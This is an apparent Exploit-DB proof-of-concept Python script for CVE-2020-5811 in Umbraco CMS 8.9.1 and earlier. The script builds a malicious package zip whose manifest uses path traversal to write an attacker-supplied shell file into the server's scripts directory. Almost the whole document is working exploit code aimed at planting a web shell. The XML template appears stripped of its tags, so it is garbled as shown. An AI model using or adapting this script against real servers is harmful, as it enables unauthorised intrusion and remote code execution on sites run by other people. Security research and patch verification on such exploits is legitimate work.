# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated) # Exploit Author: BitTheByte # Description: Authenticated path traversal vulnerability. # Exploit Research: https://www.tenable.com/security/research/tra-2020-59 # Vendor Homepage: https://umbraco.com/ # Version: <= 8.9.1 # CVE : CVE-2020-5811 import string import random import argparse import zipfile import os package_xml = f""" {{filename}} {{upload_path}} {{filename}} PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))} 1.0.0 MIT License https://example.com 0 0 0 CVE-2020-5811 https://example.com """ parser = argparse.ArgumentParser(description='CVE-2020-5811') parser.add_argument('--shell', type=str, help='Shell file to upload', required=True) parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts') args = parser.parse_args() if not os.path.isfile(args.shell): print("[ERROR] please use a correct path for the shell file.") output_file = "exploit.zip" package = zipfile.ZipFile(output_file, 'w') package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path)) package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read()) package.close() print(f"[DONE] Created Umbraco package: {output_file}")